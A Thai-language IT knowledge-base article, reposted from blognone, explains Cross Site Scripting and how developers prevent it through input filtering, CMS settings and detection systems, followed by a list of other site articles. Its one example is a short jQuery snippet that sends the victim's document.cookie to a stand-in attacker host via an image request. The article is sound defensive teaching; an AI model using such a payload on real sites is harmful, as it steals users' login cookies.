ข้อมูลองค์ความรู้โดย
Web Master (IT)
ตำแหน่ง อาจารย์

Cross Site Scripting: อันตรายใกล้ตัวของคนใช้เว็บ

ประเภททางด้าน IT หลัก :   Networking & Infrastructure
ประเภททางด้าน IT ย่อย :   Security
  ลงข้อมูลเมื่อ 16:57:27 17/01/2013
  Page View (1363) แบ่งปัน

คำเตือน: บทความในชุดการรักษาความปลอดภัยคอมพิวเตอร์ มีจุดประสงค์หลักเพื่อการศึกษา และการระมัดระวังของนักพัฒนา การทดสอบต้องทำในสภาพแวดล้อมปิดเท่านั้น (ตั้งเซิร์ฟเวอร์เฉพาะเอง ทดสอบเสร็จแล้วปิดบริการ) ห้ามทดสอบในเว็บจริงที่ให้บริการอยู่ 

ปัญหาอย่างหนึ่งที่พบได้และมักมีอันตรายมากกว่าคือปัญหาความปลอดภัย Cross Site Scripting (XSS หรือบางครั้งเรียกว่า CSS) ที่เป็นช่องให้แฮกเกอร์สามารถนำสคริปต์อยากที่แฮกเกอร์ต้องการไปวางบนหน้าเว็บเป้าหมายได้

ปัญหา XSS เกิดจากเมื่อเว็บรับข้อมูลจากผู้ใช้โดยไม่มีการกรองสคริปต์ออกจากอินพุตของผู้ใช้ก่อน ไม่ว่าจะเป็นการรับผ่านยูอาร์แอล หรือจะรับผ่านแบบฟอร์มต่างๆ

การรันสคริปต์ได้ทำให้ทำให้แฮกเกอร์สามารถขโมยข้อมูลที่ควรเป็นความลับของผู้ใช้ เช่น คุกกี้ที่เป็นความลับสำหรับการล็อกอิน ตัวอย่างเช่นการวางคอมเมนต์ในเว็บๆ หนึ่ง หากผู้ใช้สามารวางสคริปต์

 

1
2
3
4
<img id="hackingimage" src="null.png">img>
<script>
$("#hackingimage").attr('src',"http://hackingserver.example/hacked.png?cookie="+document.cookie);
script>

 

ตัวอย่างเช่นนี้ (ตัวอย่างในกรณีที่ใช้ jquery) ทำให้แฮกเกอร์ที่สร้างเซิร์ฟเวอร์เพื่อรับ request รูปภาพที่เบราว์เซอร์ของเหยื่อส่งออกไป โดยส่งข้อมูลคุกกี้ทั้งหมดออกไปด้วย

การป้องกัน

การป้องกันปัญหาความปลอดภัย XSS อาศัยการกรองอินพุตจากผู้ใช้เป็นหลัก โดยอินพุตต่างๆ ไม่ควรถูกนำมาใช้งานในทันที แต่ต้องมีการกรองก่อนทุกครั้ง และต้องมั่นใจได้ว่าผู้ใช้ไม่สามารถวางสคริปต์ใดๆ ลงในเว็บได้

ค่าความปลอดภัยเริ่มต้นของ CMS หลายตัวมักตั้งค่าความปลอดภัยสำหรับ XSS ไว้เป็นอย่างดีแล้ว ตัวอย่างในกรณีของ Drupal นั้นจะกำหนด filtered HTML สำหรับผู้ใช้ทั่วไป และ full HTML สำหรับผู้ใช้ที่วางใจได้เท่านั้น โดย filtered HTML จะปิดไม่ให้ผู้ใช้สามารถวางสคริปต์ใดๆ ลงในแบบฟอร์มได้ หรือหากวางได้ก็จะแสดงผลเป็นโค้ดไปยังหน้าเว็บ ไม่ได้เป็นสคริปต์ที่รันได้ ซึ่งการกรองเหล่านนี้ไม่ใช่เพียงแท็ก script เท่านั้นแต่รวมไปถึง attribute หลายตัว เช่น onload, onclick รวมเป็น Event Handler ทั้งหมด 94 กรณี และ CSS ในบางกรณีอีกด้วย (ดูรายการตรวจสอบ XSS ได้ใน OWASP)

ระบบป้องกันจำพวก Intrusion Detection System (IDS) หลายตัวมีความสามารถในการตรวจจับว่าผู้ใช้พยายามโพสสคริปต์เข้ามายังเว็บหรือไม่ ทำให้สามารถแจ้งเตือนได้แต่เนิ่นๆ ว่ามีความพยายามทดสอบว่าเว็บมีการรักษาความปลอดภัยที่ดี

ทุกวันนี้การวางข้อมูลจากเว็บอื่นๆ เช่น กรณีของ YouTube นั้นได้รับความนิยมเป็นอย่างมาก นักพัฒนาต้องระวังว่าการเปิดเว็บให้รองรับการวางข้อมูลเหล่านี้ไม่ใช่เรื่องสำคัญที่สุด บางเว็บเช่น Twitter กลับพยายามให้ผู้ใช้ปล่อยให้ใช้แท็ก script เพื่อจะแสดงผลได้ถูกต้อง กรณีแบบนี้ควรระวังที่จะไม่ยอมรับการแสดงผลแบบนี้หรือหากยอมรับก็ต้องมีการกรองเพิ่มเติมอย่างระมัดระวัง

ในฝั่งเบราว์เซอร์เอง เบราว์เซอร์ยุคใหม่ล้วนมีความสามรถในการวิเคราะห์โค้ดที่มีความพยายามโจมตีด้วย XSS กันมากขึ้นเรื่อยๆ เช่น การฝังสคริปต์ไว้ในยูอาร์แอล แต่ความสามารถเหล่านี้ก็ยังจำกัดอยู่มาก ความรับผิดชอบจึงตกกับนักพัฒนาเว็บเป็นหลัก

XSS และ CSRF เป็นปัญหาความปลอดภัยสำคัญที่เป็นความรับผิดชอบของนักพัฒนาเว็บโดยตรงที่จะป้องกันปัญหาเปล่านี้ ความระมัดระวังในทุกๆ อินพุตเป็นสิ่งสำคัญมาก เมื่อเรากำลังให้บริการทั้งโลกที่ไม่แน่ใจว่ามีใครพยายามทำอะไรอยู่บ้าง

นักพัฒนาที่ยังไม่คุ้นชินกับการพัฒนาเว็บเช่นนี้ ควรเรียนรู้บทเรียนที่นักพัฒนารุ่นก่อนล้วนได้ประสบเจอกันมาก่อนแล้ว เฟรมเวิร์คและ CMS สำหรับการพัฒนาเว็บทั้งหลายล้วนเป็นผลของการสะสมประสบการณ์เหล่านี้เป็นอย่างดี อย่างเช่น Django หรือCodeIgnitor ผมยังคงย้ำว่าในยุคนี้หากไม่ใช่ผู้เชี่ยวชาญเฉพาะทางแล้ว เราไม่ควรพัฒนาเว็บจากการเขียน php บรรทัดแรกด้วยตัวเองเหมือนแต่เดิมอีกต่อไป

ที่มา blognone

โดย lew



องค์ความรู้ที่มีผู้อ่านมากสุด
รายละเอียดของระบบ e-Purchasing Online ของกรมส่งเสริมอุตสาหกรรม กระทรวงอุตสาหกรรม
รายละเอียดของระบบ e-Purchasing Online ของกรมส่งเสริมอุตสาหกรรม กระทรวงอุตสาหกรรม

โดย... Web Master (IT)

เรียนรู้เรื่อง เมนบอร์ด (Mainboard, mother board)
แผงวงจรหลัก เป็นหัวใจสำคัญที่สุดที่อยู่ภายในเครื่อง เมื่อเปิดฝาเครื่องออกมาจะเป็นแผงวงจรขนาดใหญ่วางนอนอยู่ นั่นคือส่วนที่เรียกว่า "เมนบอร์ด"

โดย... Web Master (IT)

AutoCAD คืออะไร
AutoCAD (Computer Aided Drefting/Dedign, CAD) เป็นซอฟต์แวร์ช่วยออกแบบด้วยคอมพิวเตอร์ ที่สามารถรองรับการทำงานทั้งใน 2 มิติ และ 3 มิติ

โดย... Web Master (IT)

ทำความรู้จักกับ IIG (International Internet Gateway ) & NIX(National Internet Exchange )
การใช้งานอินเตอร์เน็ตของเราทุกคน จำเป็นต้องผ่านระบบการให้ บริการของ IIG และ NIX เพราะว่า เป็นเหมือนเส้นทางหลักของศูนย์กลางโครงข่าย ของประเทศไทย ทั้งภายในและ ภายนอกประเทศ ที่จากเดิมเราจะทราบกันอยู่แล้วว่า บริการทั้งสองประเภทนี้จะมีผู้ให้บริการ แบบผูกขาดอยู่เพียงรายเดียวเท่านั้น คือ การสื่อสารแห่งประเทศไทย เพียงเท่านั้น แต่ ณ ปัจจุบันนี้ได้มีหน่วยงานที่เข้ามา กำกับดูแลในเรื่องของโทรคมนาคมของเมืองไทยอย่างเป็น รูปธรรมมากยิ่งขึ้น จึงก่อให้เกิดการแข่งขันอย่างเสรี และปัจจุบัน ทาง กทช. ผู้เป็นหน่วยงานหลัก ของ การกำกับดูแลได้เปิดอนุญาตให้กลุ่มบริษัทเอกชนทั่วไป สามารถขอรับใบอนุญาต การให้ บริการทั้งสองประเภทได้ เพื่อให้เกิดการแข่งขันกันอย่างเป็นธรรม และก่อให้ เกิดประโยชน์สูงสุด แก่ผู้บริโภคกันเลยละครับ

โดย... Web Master (IT)

ความรู้เรื่อง...การ์ดจอ
การ์ดจอ (Video Card) การ์ดแสดงผล หรือ กราฟฟิกการ์ด (Graphic card) เป็น แผงวงจรอิเล็กทรอนิกส์ ที่ทำหน้าที่ในการนำข้อมูลที่ได้จากการประมวลผลของซีพียูมาแสดงบนจอภาพ ทำให้ผู้ใช้ สามารถควบคุมการทำงาน ได้อย่างมีประสิทธิภาพ โดยจอภาพจะเป็นส่วนที่รับข้อมูลจากการ์ดแสดงผลอีกทีหนึ่ง การ์ดกราฟฟิกทีได้รับความนิยมและใช้กันแพร่หลายในอยู่ปัจจุบัน เป็นการ์ดกราฟฟิกที่มี GPU เป็นตัวประมวลผล

โดย... Web Master (IT)

Windows XP Service Pack 3 Overview
ภาพรวม Windows XP Service Pack 3 จะประกอบด้วย security updates hotfix และ patch ต่างๆ ที่ไมโครซอฟท์ปล่อยหลังออก SP2 เป็นต้นมาไม่มีการเปลี่ยนแปลงในเชิงฟังก์ชั่นและการทำงานที่สำคัญ แต่จะอัพเดตองค์ประกอบต่างๆ อย่าง Microsoft Management Console (MMC) 3.0 และ Microsoft Core XML Services 6.0 (MSXML6) เป็นเวอร์ชั่นปัจจุบัน สิ่งที่น่าสนใจประการหนึ่งคือ ไมโครซอฟท์ไม่ได้รวมเอา Windows Internet Explorer 7 เข้ามาไว้ใน SP3 แต่จะใส่มาเฉพาะส่วนที่เป็นอัพเดตและ fix เท่านั้น คล้ายกับว่าไมโครซอฟท์ตั้งใจจะไม่บีบให้ลูกค้าต้องเปลี่ยนจาก IE6 มาใช้ IE7 ใครที่ต้องการอยู่กับ IE6 (ด้วยเหตุผลใดก็ตาม) ก็จะยังสามารถใช้ IE6 ได้ สำหรับใครที่เปลี่ยนไปเป็น IE7 แล้วจะมีอัพเดตมาให้เช่นเดียวกัน

โดย... Web Master (IT)

การประยุกต์ใช้ DATA WAREHOUSEING
มีการประมาณการณ์เอาไว้ว่า ถ้าไม่มีการนำเอาระบบ Data Warehouse มาประยุกต์ใช้ในองค์กร จะมีคน เพียง 10 เปอร์เซ็นต์เท่านั้นที่จะสามารถใช้งานระบบสารสนเทศได้ตามความต้องการ และนั่นก็คือจำนวนคนที่มีระดับความรู้ ทาง IT เพียงพอที่จะสร้าง Query ขึ้นด้วยตนเองเพื่อสนองความต้องการด้านข้อมูลของตน นอกจากนั้นแล้ว ระบบ EIS (Executive Information System) และ DSS (Decision Support System) ก็มักจะทำงานได้ไม่ตรงกับที่ต้องการ เพราะข้อมูล ดิบจากฐานข้อมูลประจำวันนั้น เข้าถึงยาก หรือไม่ก็ทำความเข้าใจได้ไม่ง่ายนัก ยิ่งไปกว่านั้น การอนุญาตให้ผู้ใช้ระดับสูง สามารถเข้าถึงและค้นหาฐานข้อมูลได้โดยตรงอาจจะส่งผลต่อประสิทธิภาพของงานข้อมูล รวมไปถึงความเป็นระเบียบ (Data Integrity) ของฐานข้อมูลด้วย

โดย... Web Master (IT)

นวัตกรรมรถบรรทุกขนาดใหญ่ B-double รถกึ่งพ่วงบรรทุกแบบพิเศษ
ในยุคที่ประสิทธิภาพและต้นทุนการขนส่งเป็นเรื่องสำคัญที่ต้องพัฒนาร่วมกันอย่างเร่งด่วน โดยเฉพาะเมื่อต้นทุนหลักของการขนส่งคือน้ำมันเชื้อเพลิงมีสัดส่วนสูงขึ้นอย่างต่อเนื่อง ก๊าซธรรมชาติและไบโอดีเซลกลายเป็นประเด็นสำคัญที่ผู้ประกอบการขนส่งต้องศึกษาและพัฒนากองรถมาทดลองและใช้กันแน่นอน การพัฒนารถไฟและการขนส่งทางลำน้ำให้สามารถขนส่งสินค้าในเส้นทางหลักได้มากขึ้น มีบริการที่แน่นอนและสามารถเชื่อมต่อกับการขนส่งด้วยรถบรรทุกได้สะดวกรวดเร็ว เป็นเรื่องที่ทุกฝ่ายปรารถนา เพราะคาดหมายว่าจะทำให้การขนส่งได้ประสิทธิภาพที่ดีกว่าด้วยต้นทุนที่ต่ำกว่าการขนส่งด้วยรถบรรทุก ประเด็นเรื่องการขนส่งในปริมาณมากๆ ต่อเที่ยว มักจะยกประเด็นในเรื่องการประหยัดพลังงาน การลดปริมาณมลพิษจากน้ำมัน และการประหยัดค่าจ้างแรงงานของพนักงานขับรถ โดยทั้งหมดคิดหารเฉลี่ยจากจำนวนหน่วยสินค้าและระยะทางขนส่งต่อเที่ยวนั้นๆ หลายครั้งที่รถบรรทุกถูกวางตำแหน่งให้ทำหน้าที่ขนส่งและกระจายสินค้าในระยะทางรัศมีสั้นๆ รอบๆ สถานีหรือต้นทางปลายทางที่เป็น hub

โดย... Web Master (IT)

เรียนรู้เรื่อง CPU
CPU (Central Processing Unit) หรือ โปรเซสเซอร์ (Processor) คือ ส่วนหนึ่งของเครื่องคอมพิวเตอร์ที่มีหน้าที่ควบคุมกา รทำงานของส่วนอื่นๆ โดยทั่วไปแล้ว ซีพียูจะประกอบไปด้วย หน่วยควบคุม (Control Unit), หน่วยประมวลผลคณิตศาสตร์และตรรกศาสตร์ (Arithmetic and Logic Unit; ALU) และหน่วยความจำ ได้แก่ รีจีสเตอร์ (Register), แคช (Cache), แรม (RAM) และรอม (ROM)

โดย... Web Master (IT)

การเขียนโปรแกรมเชิงวัตถุ (Object Oriented Programming: OOP)
ในปัจจุบันภาษาในการเขียนโปรแกรมเพื่อพัฒนาระบบสารสนเทศที่ใช้ในองค์กรธุรกิจ มีมากมายหลายภาษาให้เลือก การเรียนรู้ภาษาเขียนโปรแกรมหรือการมีความรู้ในหลาย ๆ ภาษาถือเป็นสิ่งที่ดี แต่ไม่ได้หมายความว่าเราจำเป็นต้องเขียนโปรแกรมให้ได้ทุก ๆ ภาษา แต่สามารถเลือกบางภาษาที่เรามีความถนัดหรือเลือกที่จะเริ่มต้นกับภาษาใด ภาษาหนึ่งได้ ซึ่งการเขียนโปรแกรมเชิงวัตถุถือได้ว่าได้รับความนิยมในปัจจุบันรวมถึงแนวโน้มในอนาคต ซึ่ง Java ก็เป็นหนึ่งในการเขียนโปรแกรมเชิงวัตถุ ที่มีพื้นฐานมาจากภาษา C และคิดว่าน่าจะเป็นอีกภาษาหนึ่งที่น่าศึกษาและน่าเรียนรู้ เพราะเทคโนโลยีของ Java ถือว่ากำลังร้อนแรงในแวดวงของ Software

โดย... Web Master (IT)